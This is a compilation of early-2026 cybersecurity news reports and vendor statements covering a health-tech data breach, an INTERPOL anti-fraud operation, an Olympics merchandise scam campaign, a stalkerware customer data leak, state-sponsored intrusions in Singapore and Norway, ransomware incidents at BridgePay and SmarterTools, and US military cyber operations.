The data includes personal information like patients’ names, dates of birth, home addresses, and Social Security numbers, as well as information about their healthcare, such as their provider’s name, demographic data, and health and insurance details.

TriZetto said it identified the breach on October 2, 2025, but later discovered that the hackers had access as far back as November 2024.

Cognizant spokesperson William Abelson said the company “eliminated the threat” to its environment, but would not say why it took the company a year to detect the breach.

Several organizations have confirmed that their patients’ information was compromised in the cyberattack. One of these is OCHIN, a nonprofit consultancy firm that provides healthcare technology to some 300 rural and community care providers across the United States. Other healthcare providers across California have also confirmed.

According to TriZetto, not every customer was affected by the breach.

TriZetto is the latest major health tech company to confirm a hack in recent years.

In 2024, a ransomware attack at Change Healthcare, another health tech giant that processes some 15 billion healthcare transactions, allowed hackers to make off with more than 192 million patient files. The cyberattack sparked outages across the U.S., leaving many without access to medical treatments or medications.

Updated with comment from Cognizant.

www.interpol.int
18 February 2026

Cyber operation dismantles criminal networks running transnational fraud schemes

LYON, France – Law enforcement agencies from 16 African countries have made 651 arrests and recovered more than USD 4.3 million in an international cybercrime operation against online scams.

Operation Red Card 2.0 (8 December 2025 to 30 January 2026) targeted the infrastructure and actors behind high-yield investment scams, mobile money fraud and fraudulent mobile loan applications.

During the eight-week operation, investigations exposed scams linked to over USD 45 million in financial losses and identified 1,247 victims, predominantly from the African continent but also from other regions of the world. Authorities also seized 2,341 devices and took down 1,442 malicious IPs, domains and servers, as well as other related infrastructure.

INTERPOL supported the operation through critical intelligence sharing, real-time information exchange and capacity-building activities, including training on digital forensic tools.

Neal Jetton, INTERPOL’s Director of the Cybercrime Directorate, said:

“These organized cybercriminal syndicates inflict devastating financial and psychological harm on individuals, businesses and entire communities with their false promises. Operation Red Card highlights the importance of collaboration when combatting transnational cybercrime. I encourage all victims of cybercrime to reach out to law enforcement for help.”

The architecture of fraud: Key cases reveal diverse scam models

In Nigeria, police dismantled a high-yield investment fraud ring that recruited young individuals to carry out cyber-enabled crimes using phishing, identity theft, social engineering and fake digital asset investment schemes. Over 1,000 fraudulent social media accounts were taken down and investigators uncovered a residential property constructed by the syndicate ringleader to serve as the operational hub for the criminal activities.
In Kenya, authorities made 27 arrests linked to fraud schemes that used messaging apps, social media and fictitious testimonials to lure victims into making fake investments in reputable global corporations. Scammers solicited small initial investments ‒ as low as USD 50 ‒ with claims of lucrative returns. Victims were shown fabricated account statements or dashboards but withdrawal requests were systematically blocked.
In Côte d’Ivoire, law enforcement made 58 arrests and seized 240 mobile phones, 25 laptops and over 300 SIM cards in a targeted operation against mobile loan fraud. These scams predominantly targeted vulnerable populations through deceptive mobile applications and messaging services, attracting victims with promises of quick, unsecured loans, only to impose fees, enforce abusive debt-collection practices and illicitly harvest sensitive personal and financial data.
In a separate major success for Nigerian authorities, six members of a sophisticated cybercrime syndicate were arrested for infiltrating the internal platform of a major telecommunications provider through compromised staff login credentials. An investigation led to the disruption of the scheme, which involved siphoning significant volumes of airtime and data for illegal resale.
During Operation Red Card 2.0, INTERPOL worked closely with its partners, Cybercrime Atlas, Team Cymru, Trend Micro, TRM Labs and Uppsala Security, leveraging their data and expertise to provide critical intelligence to participating countries.

Notes to editors

The operation was conducted under the African Joint Operation against Cybercrime (AFJOC), an initiative funded by the UK’s Foreign, Commonwealth & Development Office.

The Global Action on Cybercrime Enhanced (GLACY-e) project, a joint initiative of the European Union and the Council of Europe, provided operation-specific support.

Participating member countries

Angola, Benin, Cameroon, Côte d’Ivoire, Chad, Gabon, Gambia, Ghana, Kenya, Namibia, Nigeria, Rwanda, Senegal, Uganda, Zambia and Zimbabwe.

bitdefender.com
Alina BÎZGĂ
February 17, 2026

Bitdefender Labs is tracking an ongoing scam campaign on Meta platforms targeting people in the EU and the US, using fraudulent “Olympics Shop” advertisements that offer discounts of up to 80% on Milano Cortina 2026 merchandise.

Bitdefender Labs is tracking an ongoing scam campaign on Meta platforms targeting people in the EU and the US, using fraudulent “Olympics Shop” advertisements that offer discounts of up to 80% on Milano Cortina 2026 merchandise.

Users who click on these ads and interact with the fraudulent websites expose themselves to several risks. Many similar scam operations are designed to steal payment card information at checkout, harvest personal details such as names, addresses, phone numbers, and email accounts, and in some cases collect login credentials.

Victims may also receive counterfeit merchandise — or nothing at all — after completing a purchase. In many instances, the sites disappear shortly after processing payments, leaving buyers with no way to recover their money.

At a glance, the ads look legitimate.

They feature official Olympic imagery, professional product photos, and convincing promotional messages such as:

“Olympics Exclusive! Up to 80% OFF.
30 Days No Excuse Free Return.
🛒Get Yours Before Out of Stock!”

“Olympics Esclusivo! Sconti fino all'80%.”
“Reso gratuito entro 30 giorni, senza domande.”
“Acquistalo prima che finisca!”

But the danger begins after the click.

Near-Perfect Clones of the Official Olympics Shop

The fraudulent websites are not crude copies – they are near-perfect replicas of the official Olympics merchandise store.

Bitdefender Labs observed that the scam sites use:

The same product photos
Identical color schemes
The same merchandise collections
Official branding elements
Similar layout structure
At a glance, most users would struggle to tell the difference.

The deception lies in the small details.

For example:

The legitimate store promotes “Sign up & Save 15%.”
The scam websites advertise “Sign & Save 80%.”
Official Olympics Shop

Fake Olympics Shop

That small wording change reflects the core tactic: inflate discounts to trigger a sense of urgency and bypass skepticism.

Font rendering may be slightly different. Minor layout inconsistencies appear in certain sections. Domain names look similar but are newly registered and unrelated to the official organization.

These subtle discrepancies are easy to miss when a user is focused on a limited-time deal.

Coordinated Scam Infrastructure

This campaign shows clear signs of coordination, and as Labs researcher Andreea Olariu points out, most of the fraudulent domains were registered within days of each other:

www.olympics2026[.]store – created Feb 3
Olympicseu[.]shop – created Feb 9
olympics-sale[.]top – created Feb 9
olympics-hot[.]top – created Feb 9
www.olympics-top[.]shop –created Feb 10
Olympicssportswear[.]shop – created Feb 10
Olympexapparel[.]shop – created Feb 10
Lifestylecollection[.]shop – created Feb 10
www.2026olympics[.]store – created Feb 11
Following the initial detection of the scam advertisements, Olariu observed ongoing domain registrations consistent with the same impersonation strategy. The daily appearance of new lookalike domains indicates an adaptive infrastructure designed to evade detection and extend the campaign’s lifespan.

Most recent domains include:

Olymponline[.]top – created Feb 11
Postolympicsale[.]com created Feb 11
sale-olympics[.]top - created Feb 11
olympics-save[.]top - created Feb 11
olympicssportswears[.]shop - created Feb 11
olympicsfashionhub.[]shop - created Feb 12
All these domains are flagged as fraudulent by Bitdefender security systems.

In some instances, ads appear to display the official shop preview but silently redirect users to www.olympics2026[.]store for example.

Newly Created Facebook Pages Running the Ads
Another strong indicator of fraud: the Facebook pages promoting these ads are newly created.

Bitdefender Labs observed that several of these pages were set up on the same day the scam domains were registered. This suggests a rapid deployment model:

Register domain
Clone official website
Create Facebook page
Launch ad campaign
Begin collecting payments
All within a short time window.

Legitimate global brands rarely create brand-new pages and immediately launch aggressive 80% discount campaigns tied to major international events.

The sophistication of the cloning significantly increases the risk. When scam sites mirror official branding almost perfectly, users default to visual familiarity instead of domain verification.

That’s exactly what attackers are counting on.

February 13, 2026 12:36 pm CET
By Antoaneta Roussi

“We also have to have offensive capacity,” says Commissioner Henna Virkkunen.

Europe must be able to strike back in cyberspace, as the strategy to deter adversaries is no longer enough, the EU executive's tech and security chief told POLITICO.
“It’s not enough that we are just defending ... We also have to have offensive capacity,” the European Commission's Executive Vice President Henna Virkkunen said in an interview on the sidelines of the Munich Security Conference on Friday.
For years, European capitals have held back from stating publicly that they support offensive cyber operations — known as "hacking back" — because of fears that such operations could trigger retaliation and escalation from countries like Russia, China and others.
But the tide is turning, as EU states including Germany, Latvia and others warm to the idea of conducting offensive cyber operations. The European Commission also mentioned the need for both defensive and offensive cyber capabilities in its defense white paper in December.
Virkkunen said the Commission is also identifying critical areas and industries where Europe wants more control over its data. It is part of a broader push to reduce dependence on foreign technology and build a homegrown tech and cyber industry in Europe.
“We don’t want to have risky dependencies in any critical fields,” she said. “That doesn’t mean we plan to do everything on our own. When we don’t have certain capacities ourselves, we are very willing to work with like-minded partners to build resilient supply chains.”

| The Record from Recorded Future News
therecord.media
Alexander Martin
February 13th, 2026

The European Union can no longer afford to be “naive” about adversaries’ ability to switch off critical infrastructure, the EU’s top tech official warned Friday, as she called for tougher rules and more investment to protect Europe from cyber and hybrid threats.

EU can’t be ‘naive’ about enemies shutting down critical infrastructure, warns tech official
MUNICH, Germany — The European Union can no longer afford to be “naive” about adversaries’ ability to switch off critical infrastructure, the EU’s top tech official warned Friday, as she called for tougher rules and more investment to protect Europe from cyber and hybrid threats.

Speaking at the Munich Cyber Security Conference, European Commission Executive Vice President Henna Virkkunen said cyberattacks have become a central tool of modern conflict, often coordinated with physical sabotage, disinformation and economic pressure.

Europe’s power grids, hospitals, financial systems, satellites and military command networks are all deeply dependent on digital infrastructure — and increasingly exposed, she warned.

“In today’s world, there is no security without cybersecurity,” said Virkkunen, pointing to recent attacks and interference targeting hospitals, energy networks, public administrations, supply chains and democratic processes across Europe.

She said the Commission last month proposed revising the EU’s Cybersecurity Act to strengthen the bloc’s cybersecurity agency and reduce risks in critical information and communications technology supply chains. The draft proposal would see member states phase out the use of designated high-risk suppliers within their critical national infrastructure.

The potential threat posed by Chinese network equipment suppliers such as Huawei and ZTE had previously resulted in several national decisions to restrict those vendors from contributing to various parts of telecommunications infrastructure.

The use of U.S. technology and service providers had also prompted concern across the EU following President Trump’s unpredictable decisions to sanction various political figures — resulting in prohibitions against those officials using technology provided by companies such as Microsoft — and aggressive posture towards Greenland.

Those concerns were partially assuaged by U.S. National Cyber Director Sean Cairncross on Thursday, who stressed the U.S. wants European partners to work alongside it in cyberspace to confront the most significant threats — and stressed that the U.S. technology stack was safer than that offered by China.

Cairncross echoed a line coined by Secretary of State Marco Rubio, saying the U.S. “America first” approach does not mean “America alone.” Rubio is expected to deliver a keynote to the main Munich Security Conference on Saturday in the wake of an extremely controversial speech delivered by JD Vance last year.

Without naming specific states, Virkkunen argued that Europe’s growing reliance on digital systems has expanded the attack surface for hostile actors and made cyber defense a core part of defense readiness. “We can no longer afford to be naive about who has the capacity to switch off the ICT systems running our critical infrastructure,” she said.

She also pointed to new EU action plans on drone and undersea cable security, following recent incidents, as examples of efforts to improve prevention, detection and rapid response across borders.

Cyber, she said, is now a core military domain, and Europe must build stronger capabilities and a homegrown cyber industry, including by using advanced computing and artificial intelligence for defense. The goal, Virkkunen said, is to ensure Europe remains resilient, secure and able to withstand growing hybrid threats.

techcrunch.com
Zack Whittaker
Lorenzo Franceschi-Bicchierai
8:20 AM PST · February 9, 2026

More than half-a-million people who bought access to phone surveillance and social media snooping apps had their email address and partial payment card numbers published online.

A hacktivist has scraped more than half-a-million payment records from a provider of consumer-grade “stalkerware” phone surveillance apps, exposing the email addresses and partial payment information of customers who paid to spy on others.

The transactions contain records of payments for phone-tracking services like Geofinder and uMobix, as well as services like Peekviewer (formerly Glassagram), which purport to allow access to private Instagram accounts, among several other monitoring and tracking apps provided by the same vendor, a Ukrainian company called Struktura.

The customer data also includes transaction records from Xnspy, a known phone surveillance app, which in 2022 spilled the private data from tens of thousands of unsuspecting people’s Android devices and iPhones.

This is the latest example of a surveillance vendor exposing the information of its customers due to security flaws. Over the past few years, dozens of stalkerware apps have been hacked, or have managed to lose, spill, or expose people’s private data — often the victims themselves — thanks to shoddy cybersecurity by the stalkerware operators.

Stalkerware apps like uMobix and Xnspy, once planted on someone’s phone, upload the victim’s private data, including their call records, text messages, photos, browsing history, and precise location data, which is then shared with the person who planted the app.

Apps like uMobix and Xnspy have explicitly marketed their services for people to spy on their spouses and domestic partners, which is illegal.

The data, seen by TechCrunch, included about 536,000 lines of customer email addresses, which app or brand the customer paid for, how much they paid, the payment card type (such as Visa or Mastercard), and the last four digits on the card. The customer records did not include dates of payments.

TechCrunch verified the data was authentic by taking several transaction records containing disposable email addresses with public inboxes, such as Mailinator, and running them through the various password reset portals provided by the various surveillance apps. By resetting the passwords on accounts associated with public email addresses, we determined that these were real accounts.

We also verified the data by matching each transaction’s unique invoice number from the leaked dataset with the surveillance vendor’s checkout pages. We could do this because the checkout page allowed us to retrieve the same customer and transaction data from the server without needing a password.

The hacktivist, who goes by the moniker “wikkid,” told TechCrunch they scraped the data from the stalkerware vendor thanks to a “trivial” bug in its website. The hacktivist said they “have fun targeting apps that are used to spy on people,” and subsequently published the scraped data on a known hacking forum.

The hacking forum listing lists the surveillance vendor as Ersten Group, which presents itself as a U.K.-presenting software development startup.

TechCrunch found several email addresses in the dataset used for testing and customer support instead reference Struktura, a Ukrainian company that has an identical website to Ersten Group. The earliest record in the dataset contained the email address for Struktura’s chief executive, Viktoriia Zosim, for a transaction of $1.

Representatives for Ersten Group did not respond to our requests for comment. Struktura’s Zosim did not return a request for comment.

| Cyber Security Agency of Singapore
www.csa.gov.sg
9 February 2026

The Cyber Security Agency of Singapore (CSA) and the Infocomm Media Development Authority (IMDA) shared details of a multi-agency cybersecurity operation, codenamed Operation CYBER GUARDIAN, to defend our telecommunications sector.

Press Releases
Largest Multi-Agency Cyber Operation Mounted to Counter Threat Posed by Advanced Persistent Threat (APT) Actor UNC3886 to Singapore’s Telecommunications Sector
9 February 2026

The Cyber Security Agency of Singapore (CSA) and the Infocomm Media Development Authority (IMDA) shared details of a multi-agency cybersecurity operation, codenamed Operation CYBER GUARDIAN, to defend our telecommunications sector.

Background
2 On 18 July 2025, Coordinating Minister for National Security Mr K Shanmugam shared that Advanced Persistent Threat (APT) actor UNC3886 had been detected attacking our critical infrastructure. No further details were shared then, to preserve operational security. Over the past months, our investigations have indicated that UNC3886 had launched a deliberate, targeted, and well-planned campaign against Singapore’s telecommunications sector. All four of Singapore’s major telecommunications operators (“telcos”) – M1, SIMBA Telecom, Singtel and StarHub – have been the target of attacks.

Singapore’s telcos targets of cyberattacks
3 APTs are sophisticated and persistent, getting past defences with advanced methods over time. UNC3886 is an APT actor with deep capabilities. UNC3886 deployed advanced tools in their campaign to gain access into our telco systems. For example:

a. In one instance, they used a zero-day exploit[1] to bypass a perimeter firewall of our telcos and gained access into our telco networks. They also managed to exfiltrate a small amount of technical data; this is believed to be primarily network-related data to advance the threat actors’ operational objectives.

b. In another instance, the threat actor utilised advanced tools and techniques such as rootkits[2] to maintain persistent access and cover their tracks and evade detection. This made it challenging for cyber defenders to detect their presence, requiring the cyber defenders to conduct comprehensive security checks across the networks.

Operation CYBER GUARDIAN mitigated serious threat posed by UNC3886
4 The threat actor’s activities were initially detected by the telcos, who then notified IMDA and CSA of the breach. CSA, IMDA and other government agencies swiftly launched a coordinated whole-of-Government response, in partnership with the telcos to contain the breach. The operation, codenamed Operation CYBER GUARDIAN, is Singapore’s largest coordinated cyber incident response effort undertaken to date, spanning more than eleven months. Over 100 cyber defenders across agencies such as CSA, IMDA, the Centre for Strategic Infocomm Technologies (CSIT), the Digital and Intelligence Service (DIS), the Government Technology Agency of Singapore (GovTech) and the Internal Security Department (ISD) were involved in the operation.

5 Under Operation CYBER GUARDIAN, the authorities worked closely with the telcos to limit UNC3886’s movement into the networks and ensure our systems remain safe to use. So far, the attack by UNC3886 has not resulted in the same extent of damage as cyberattacks elsewhere.

a. The threat actor was able to gain unauthorised access into some parts of telco networks and systems. In one instance, they were able to gain limited access to critical systems but did not get far enough to have been able to disrupt services.

b. There is no evidence to-date that sensitive or personal data such as customer records were accessed or exfiltrated.

c. There is also no evidence that the threat actor managed to disrupt telecommunications services such as internet availability.

6 Cyber defenders have since implemented remediation measures, closed off UNC3886’s access points and expanded monitoring capabilities in the targeted telcos.

7 The close partnership between the public and private sector in Operation CYBER GUARDIAN reflects our national doctrine of cyber defence, in which government agencies, as well as the private sector come together to collectively defend our cyber space. The doctrine also guides capability development across our cyber ecosystem, sets out the roles that different parties should play in cyber defence, and the actions that should be taken during a cyber incident. This coordinated approach is a key pillar of Singapore’s cyber security.

The fight is ongoing
8 While our collective efforts have contributed to containing the attacks so far, we must be prepared that there may be future attempts to gain access into our telco infrastructure. Telcos are strategic targets for threat actors, including state-sponsored ones. They play a foundational role in powering the digital economy and transmit vast amounts of information, including sensitive data. If threat actors succeed in attacking our telcos, they have the potential to undermine our national security and our economy.

9 The Government takes a serious view of the cyberattack against our telcos. CSA and IMDA have been working closely with our telcos to strengthen their cyber defences, enhance detection capabilities, and deploy active monitoring systems to maintain vigilance against new attempts by UNC3886 to re-enter their networks. Telcos have also been putting in place interventions including joint threat hunting, penetration testing, and levelling up of capabilities. CSA will also be progressively introducing initiatives to raise the level of capabilities across our cyber ecosystem, to enable better and more timely responses against cyber threats and to strengthen Singapore’s cyber defences.

10 Speaking at an engagement event for cyber defenders involved in Operation CYBER GUARDIAN, Minister for Digital Development and Information and Minister-in-charge of Cybersecurity & Smart Nation Group, Josephine Teo, thanked the defenders for their contributions and called for continued vigilance.

11 In her address, she also highlighted the important role played by critical infrastructure operators who are at the frontlines of the battle against cyber threat actors. She said, “Your actions, or inaction, can determine whether we succeed or fail in protecting our critical infrastructure, and our national security. I urge all of you to continue investing in upgrading your systems as well as your capabilities”. In closing, Minister Teo acknowledged the need for the government and critical infrastructure owners to work together as a team, so that we can be effective against sophisticated adversaries and protect everything we care about.

| The Record from Recorded Future News
therecord.media
Alexander Martin
February 6th, 2026

Norwegian intelligence discloses country hit by Salt Typhoon campaign
Norway’s domestic security agency confirmed Friday that the Chinese state-sponsored espionage campaign tracked as Salt Typhoon compromised network devices in Norwegian organizations.

The disclosure was made in the Norwegian Police Security Service’s (PST) annual threat assessment for 2026. The agency’s director general, Beate Gangås, said Norway was “facing its most serious security situation since World War II,” citing pressure from multiple foreign intelligence services.

Salt Typhoon is the name U.S. and allied authorities use for a Chinese cyber espionage campaign that has focused heavily on breaching telecommunications and other critical infrastructure. In its report, PST said the actor has exploited vulnerable network devices in Norway.

Gangås said foreign states — particularly China, Russia and Iran — are “conducting intelligence operations and employing hybrid tactics in Norway to undermine our resilience,” stressing the “vital” need for stronger protective security, intelligence and situational awareness.

The assessment said Chinese security and intelligence services have strengthened their ability to operate in Norway, including through cyber operations and human intelligence collection, adding that “the primary intelligence threat from China is in the cyber domain.”

China is described as posing a “substantial” threat and is expected to continue improving its efforts to collect intelligence and map Norwegian digital infrastructure.

PST also warned that China is “systematically” exploiting collaborative research and development projects to bolster its own military capacity and security capabilities.

Salt Typhoon has been linked to significant breaches of telecommunications providers and other critical infrastructure abroad. U.S. officials have said the campaign allowed attackers to intercept communications linked to senior political figures during the 2024 presidential race, including Donald Trump and JD Vance.

Last year, more than a dozen allied countries issued a joint advisory blaming three Chinese technology companies for enabling the espionage campaign, saying the intrusions were used to track the communications and movements of specific targets.

While China dominates the cyber threat picture, PST said Russia remains the principal overall threat to Norway’s security. The agency cited sustained espionage, mapping of critical infrastructure, pressure on Ukrainian refugees, covert intelligence operations using civilian vessels and the risk of sabotage.

Russian intelligence has been “closely monitoring military targets and allied activities and capabilities in Norway for many years,” the report said, adding that the tense geopolitical situation in Europe is likely to drive increased activity.

PST said it expects that to include more Russian cyber operations, influence campaigns and attempts to recruit sources via digital platforms in 2026, describing cyber activity as an integral part of Moscow’s broader intelligence effort alongside traditional espionage and influence work.

“The tense geopolitical situation in Europe means that Russian intelligence has several areas of interest in relation to Norway and other NATO countries. Given the increase in military targets on Norwegian soil, the stronger allied presence, and additional military exercises, we anticipate heightened activity from Russian intelligence services,” the agency added.

Iranian intelligence services are also expected to carry out intelligence and influence operations in Norway, the PST said, warning the regime may attempt to target Western interests through property damage, targeted assassinations, terrorist acts or destructive cyber operations.

The PST said the assessment underlines the need for closer cooperation between authorities and the private sector, particularly operators of critical infrastructure, as foreign intelligence services increasingly combine cyber operations with more traditional espionage and influence campaigns.

BridgePay Network Solutions's Status Page - BridgePay Gateway - Outage - Under Investigation.

Update
We are continuing to work with our internal teams and external partners to address the issue.

At this time, we do not have any new information to share. We understand the impact this disruption may have and sincerely appreciate your patience as our teams continue their work.

We will provide another status update tomorrow with any new information available.
Posted 12 hours ago. Feb 08, 2026 - 18:06 EST
Update
At this time, there is no new confirmed information to report. Our teams, along with federal authorities and cybersecurity specialists, are working diligently on forensic analysis, system security, and recovery planning. Restoration efforts are actively underway, and all work is being conducted with care to ensure systems are brought back online safely and securely. We not have an ETA on when this process will be completed. Because of the nature of attack - ransomware - we are still in the early stages of this process.

We do want to reiterate this was not a card data breach. No card data was compromised and any file that may have been accessed was encrypted.

We understand the disruption this causes and truly appreciate your continued patience, support, and understanding during this process.

We remain committed to transparent communication and will provide further updates as soon as meaningful new information becomes available.
Posted 2 days ago. Feb 07, 2026 - 16:14 EST
Update
We want to provide a further update regarding the cybersecurity incident affecting our systems.
It is very unfortunate that we are all facing this situation in today’s world, and we are deeply grateful for the patience, understanding, and support we have received — especially from our partners, who have offered assistance and expertise during this time.
We can now confirm that this incident was the result of a ransomware attack. As previously noted, we have engaged both local and federal authorities, along with specialized forensic and recovery teams, to assist with investigation, containment, and system restoration. We are also working closely with leading cybersecurity firms to restore operations as quickly and safely as possible.
Initial forensic findings indicate that no payment card data has been compromised, and any files that may have been accessed were encrypted. At this time, there is no evidence of usable data exposure.
We recognize that recovery may be a lengthy process, and we are working with urgency and diligence to restore systems and services in a secure and responsible manner. Our priority remains protecting our customers, partners, and operations.
We will continue to provide updates as restoration efforts progress and additional verified information becomes available.
Thank you again for your patience, trust and continued support.
Posted 2 days ago. Feb 06, 2026 - 19:08 EST
Identified
At this time, our systems are temporarily unavailable. We are actively working with the U.S. Secret Service forensic team and cybersecurity professionals to secure our environment and obtain clearance to access our systems so we can fully assess the scope of the incident. This will allow us to better understand the extent of the impact and determine the appropriate restoration and recovery process.
Please know that this matter is being treated with the highest priority, and every available resource is being dedicated to resolving the situation safely and responsibly. We do not believe there is a threat or vulnerability for our integrators at this time.
We sincerely appreciate your patience and understanding during this time. We will provide updates as soon as new information becomes available and as restoration efforts progress.
Thank you for your continued trust and support.
Posted 3 days ago. Feb 06, 2026 - 12:00 EST
Update
We are currently experiencing a system-wide service disruption. We have identified that this outage is related to a cybersecurity incident and are actively investigating with our internal teams and external specialists including the FBI.

At this time, we do not have an estimated timeframe for full restoration of services. Our teams are working diligently to assess the impact, contain the issue, and restore systems as quickly and safely as possible.

We will provide additional updates as more information becomes available. We appreciate your patience and understanding during this time.
Posted 3 days ago. Feb 06, 2026 - 06:34 EST
Investigating
BridgePay systems are currently experiencing an outage.
Our team is engaged and investigating the cause.
Expected time for resolution is unknown at this time.
Posted 3 days ago. Feb 06, 2026 - 05:48 EST
This incident affects: PathwayLink Gateway (T-Gate) - Production (Gateway.Itstgate.com - Virtual Terminal, Reporting, API, PathwayLink Boarding Portal), PathwayLink (T-Gate) UAT - Certification Environment (GatewayStage.Itstgate.com - Virtual Terminal, Reporting, API, PathwayLink UAT Boarding Portal), BridgePay Gateway - Production (BridgePay Gateway API - BridgeComm, PayGuardian Cloud API, MyBridgePay Portal - Virtual Terminal and Reporting, BridgePay Gateway WebLink 3.0 - Hosted Payment Page), BridgePay UAT - Certification Environment (BridgePay UAT API - BridgeComm, PayGuardian Cloud UAT API, MyBridgePay UAT Portal - Virtual Terminal and Reporting, BridgePay UAT WebLink 3.0 - Hosted Payment Page), and BridgePay Support (BridgePay Integration Support Portal, BridgePay Phone Support, BridgePay Email Support).

SmarterTools Derek Curtis - 03/02/2026 à 15:45

As promised, we wanted to provide additional information regarding the network breach we experienced last Thursday (January 29, 2026), along with summaries of our releases and what we have observed both on our servers and when working with SmarterMail customers who have been compromised.

Our Network Breach
Prior to the breach, we had approximately 30 servers/VMs with SmarterMail installed throughout our network. Unfortunately, we were unaware of one VM, set up by an employee, that was not being updated. As a result, that mail server was compromised, which led to the breach.

We isolate our networks, as is best practice, in the event of a breach. Because of this segmentation, our website, shopping cart, My Account portal, and several other services remained online while we mitigated the issue. None of our business applications or account data were affected or compromised.

As for what was affected, it was the network at our office and at another data center which primarily had various labs where we do much of our QC work, etc. At the data center, we hosted our Portal as well as our Hosted SmarterTrack network, which was connected via Active Directory. We didn’t see much affected there and, out of an abundance of caution, we restored some of those servers from the most recent backup, which was six hours old.

Because we are primarily a Linux company now, only about 12 Windows servers looked to be compromised and on those servers, our virus scanners blocked most efforts. None of the Linux servers were affected.

When we first noticed the breach, we instantly shut off all servers at the two locations and we disabled all internet until we completely evaluated all aspects of the breach and either eliminated servers and/or restored servers to be safe.

As a result of all this, our networks look very different than before. We have eliminated Windows from our networks where we could and we no longer use Active Directory services. Our policy in these scenarios is to replace passwords throughout our network as well.

Another thing to note, Sentinel One did a really good job detecting vulnerabilities and preventing servers from being encrypted. We use multiple virus vendors but we saw great results with Sentinel One and wanted to throw a shout out to them and encourage customers to take a look. Any virus scanner you do run on a SmarterMail server, please be sure to look at our knowledge base article on exclusions so you do not corrupt any files. Please review here: https://portal.smartertools.com/kb/a3249/virus-scanner-exceptions-for-smartermail.aspx#

We hope this helps customers understand the scope of the breach and what steps we took. More info on what we saw and what we are seeing on customers’ servers that have been compromised are included below.

Recent SmarterMail Releases
As mentioned in our previous emails, Build 9518 (January 15, 2026) contains all fixes related to the CVEs that were announced. Build 9526 (January 22, 2026) complements those fixes with additional improvements and resolves lesser issues that have been brought to our attention and/or discovered during our internal security audits.

It remains challenging to ensure all customers keep their installations up to date. Every build we release has significance. Even smaller security updates can help prevent issues such as denial-of-service attacks that might otherwise consume excessive server memory or CPU, etc.

Email remains as critical today as ever, and threats against mail servers are as high as they have ever been. The attacks are constantly evolving and technologies are constantly changing, and SmarterTools must make changes that are not always appreciated or understood. Examples include the deprecation of TLS 1.0/1.1 in favor of TLS 1.2 and above, the enforcement of SPF, DKIM, and DMARC requirements by major email providers, and other evolving standards.

Moving forward, we are continuing to audit all of our products and we will continue working with security companies and independent researchers if/when they find bugs or other issues. We are making continual updates—no matter how small—to ensure our products are as secure and optimized as possible.

As of now, there are no major known security issues with SmarterMail.

In addition, we are making a concerted effort to improve transparency in how we communicate security updates. This situation is unprecedented in our company’s history, and we are learning a great deal from it—with the help of our customers. While we do not anticipate a recurrence, we will approach any future incident even more proactively and effectively than we have.

Malicious Behaviors We Have Seen
As you can imagine, we have been working extensively with customers whose systems were vulnerable to attack. We were compromised by a group known as the Warlock Group, and we have observed similar activity on customer machines.

Once these bad actors gain access, they typically install files and wait approximately 6–7 days before taking further action. This explains why some customers experienced a compromise even after updating—the initial breach occurred prior to the update, but malicious activity was triggered later.

They often attempt to take control of the Active Directory server and create new users. From there, they distribute files across Windows machines and attempt to execute files that encrypt data.

Common folders used:
Public folders
AppData
ProgramData
SmarterTools \ SmarterMail directories
Common file names and programs observed:
Velociraptor
JWRapper
Remote Access
SimpleHelp
WinRAR (specifically older, vulnerable versions)
Run.exe
Run.dll
main.exe
Short, random filenames such as e0f8rM_0.ps1 or abc...
Random .aspx files
Other indicators:
Unusual local users or administrators
Suspicious startup items
Newly created or modified scheduled tasks
It is also important to note that CVEs are being discovered across many different products. Some groups install legitimate-looking applications on servers and later exploit. For example, the Warlock Group frequently targets CVE’s in SharePoint and Veeam and has now targeted SmarterMail. Recent Notepad++ update vulnerabilities are another example of how trusted applications can be leveraged to further exploit systems, servers, and desktops.

Based on our observations, the Warlock Group primarily targets Windows environments. We are now primarily a Linux-based company and found no Linux servers exposed to compromise.

A Final Word
We hope this provides a fuller summary of what we have seen and what customers can look for in their own environments. We also hope it demonstrates that we are taking every possible step to prevent issues like this from occurring again and making every effort to consolidate what we’re seeing and sharing with our customers.

Finally, we continue to experience elevated support volumes, but response times are improving and are now measured in hours rather than days.
Derek Curtis
CCO
SmarterTools Inc.
www.smartertools.com

| The Record from Recorded Future News
therecord.media
Martin Matishak
February 4th, 2026

The U.S. military digitally disrupted Iranian air missile defense systems during its operation last year against the country’s nuclear program, some of the most sophisticated action Cyber Command has taken to date against Iran.

Exclusive: US used cyber weapons to disrupt Iranian air defenses during 2025 strikes
The U.S. military last year digitally disrupted Iranian air missile defense systems as part of a coordinated operation to destroy the country’s nuclear program, according to several U.S. officials, another sign of America’s growing comfort with employing cyber weapons in warfare.

The strike on a separate military system connected to the nuclear sites at Fordo, Natanz and Isfahan helped to prevent Iran from launching surface-to-air missiles at American warplanes that had entered Iranian airspace, the officials said.

“Military systems often rely on a complex series of components, all working correctly. A vulnerability or weakness at any point can be used to disrupt the entire system,” according to one individual familiar with the matter who, like others, spoke on the condition of anonymity to discuss sensitive information.

In hitting a so-called “aim point” — a mapped node on a computer network, such as a router, a server or some other peripheral device — U.S. operators, enabled by intelligence from the National Security Agency, bypassed what would have been a more difficult task of breaking into a military system located at one, or all, of the fortified nuclear facilities.

“Going ‘upstream’ can be extraordinarily hard, especially against one of our big four adversaries,” another official said, referring to the quartet of Iran, China, Russia and North Korea.

“You need to find the Achilles heel.”

None of the officials would specify what kind of device was attacked. At the request of sources, Recorded Future News withheld certain details about the cyberattack due to national security concerns.

“U.S. Cyber Command was proud to support Operation Midnight Hammer and is fully equipped to execute the orders of the Commander-in-Chief and the Secretary of War at any time and in any place," a command spokesperson said in a statement, without elaborating.

The digital element of June’s Operation Midnight Hammer, which has not been previously reported, is some of the most sophisticated action Cyber Command has taken against Iran in its nearly 16-year history.

Since being granted authorities to augment its offensive capabilities during the first Trump administration, the command skirmished with the Islamic Revolutionary Guard Corps and Iranian hacker groups in the run-up to the 2020 presidential election and moved against government-aligned malicious actors before they could disrupt the 2022 midterms.

Gen. Dan Caine, the chairman of the Joint Chiefs of Staff, publicly lauded Cyber Command’s contribution during a Pentagon press conference after Midnight Hammer concluded, noting it had supported the “strike package” that saw all three nuclear sites hit in a span of less than a half-hour.

The command received similar kudos last month after it conducted cyber operations that officials say knocked out power to Venezuela's capital and disrupted air defense radar, as well as handheld radios, as part of the mission to capture President Nicolás Maduro.

Cyber Command and others “began layering different effects” on Venezuela as commandos approached in helicopters in order to “create a pathway” for them, Caine said during a press conference at Mar-a-Lago.

